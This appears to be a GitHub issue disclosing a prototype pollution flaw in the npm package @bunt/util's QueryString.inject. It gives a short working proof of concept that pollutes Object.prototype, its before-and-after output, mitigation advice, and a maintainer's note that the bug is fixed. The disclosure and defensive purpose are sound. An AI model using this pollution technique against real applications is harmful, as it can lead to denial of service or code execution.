Prototype Pollution vulnerability affecting bunt/[email protected]

[mestrtee]

Overview

Affected versions of this package are vulnerable to Prototype Pollution. An attacker can manipulate the prototype of an object, potentially leading to the alteration of behavior of all objects inheriting from the affected prototype by modify built-in Object.prototype through reachable special properties __proto__ and constructor.prototype. Thus, the attacker can use one of these properties to pollute the application logic that can be escalated to Denial of service, remote code execution or cross-site scripting attacks.

Location:

@bunt/util/dist/esm/qs.js:12

PoC:

(async () => {
  const lib = await import('@bunt/util');

var BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
var victim = {}
console.log("Before Attack: ", JSON.stringify(victim.__proto__));
try {
  lib.QueryString.inject ([["__proto__"], "polluted"], true,{})
} catch (e) { }
console.log("After Attack: ", JSON.stringify(victim.__proto__));
delete Object.prototype.polluted;
})();

Output:

Before Attack: {}


After Attack: {"polluted":true}

How to prevent:

• Freeze the root prototype using Object.freeze
• Require schema validation of JSON input.
• Avoid using unsafe recursive merge functions.
• Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.
• As a best practice use Map instead of Object

[mestrtee]

Is there any updates on this?

[izatop]

Is there any updates on this?

Hi, it fixed in c55201a
One important note: I've changed the API of QueryString. See test at packages/util/test/src/qs/QueryStirng.test.ts